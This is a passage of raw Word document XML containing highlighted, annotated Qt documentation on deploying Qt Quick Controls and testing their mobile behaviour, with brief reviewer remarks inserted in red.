            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="742" w:name="deploying-qt-quick-controls"/>
      <w:bookmarkStart w:id="743" w:name="_Toc483000688"/>
      <w:bookmarkStart w:id="744" w:name="_Toc483003705"/>
      <w:bookmarkStart w:id="745" w:name="_Toc483604040"/>
      <w:bookmarkStart w:id="746" w:name="_Toc483605260"/>
      <w:bookmarkEnd w:id="742"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deploying Qt Quick Controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="743"/>
      <w:bookmarkEnd w:id="744"/>
      <w:bookmarkEnd w:id="745"/>
      <w:bookmarkEnd w:id="746"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Since Qt 5.2, the Qt Quick Controls JavaScript and QML files are embedded into the plugin using</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId562" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt resources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(.qrc) for the</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId563" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.Controls and</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId564" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.Controls.Styles imports.</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is only necessary to deploy the qtquickcontrolsplugin C++ library and its qmldir file found in the plugin directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml/</w:t>
      </w:r>
      <w:hyperlink r:id="rId565" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The .js/.qml files are still placed into the plugin directory though for keeping the development tasks convenient, debugging and autocompletion capabilities remain unchanged. For deployment, these files can be ignored. </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In practice, the</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Styles</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Private</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subfolders can be deleted as well as all .js and .qml files present under</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml/</w:t>
      </w:r>
      <w:hyperlink r:id="rId566" w:history="1">
        <w:r w:rsidRPr="005E64B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008573B7" w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu this aspect of deployment</w:t>
      </w:r>
      <w:r w:rsidR="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On Windows, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId567" w:anchor="the-windows-deployment-tool" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Windows Deployment Tool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only deploys the Qt Quick Controls plugin and its qmldir file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="005E64B4" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using resources facilitates the deployment of the Qt Quick Controls though it has </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that still need to be addressed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="005E64B4" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On iOS, the qmlimportscanner tool is used to parse the required qml imports so they can be deployed accordingly. The files embedded in resources are not scanned by this tool though and when linking statically, some required imports used by the Qt Quick Controls can be forgotten. This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>known limitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a workaround is to add potentially missing imports in one of the qml files of the application using the controls.</w:t>
      </w:r>
      <w:r w:rsidR="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008573B7" w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu this bag</w:t>
      </w:r>
      <w:r w:rsidR="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// intbu connection controls and resources //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="747" w:name="testing-desktop-and-mobile-behavior-of-t"/>
      <w:bookmarkStart w:id="748" w:name="_Toc483000689"/>
      <w:bookmarkStart w:id="749" w:name="_Toc483003706"/>
      <w:bookmarkStart w:id="750" w:name="_Toc483604041"/>
      <w:bookmarkStart w:id="751" w:name="_Toc483605261"/>
      <w:bookmarkEnd w:id="747"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Testing Desktop and Mobile behavior of the controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="748"/>
      <w:bookmarkEnd w:id="749"/>
      <w:bookmarkEnd w:id="750"/>
      <w:bookmarkEnd w:id="751"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You can test how the controls on your application or style will behave on a mobile platform by setting the environment variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT_QUICK_CONTROLS_MOBILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, to force a behavior optimized for mobile devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
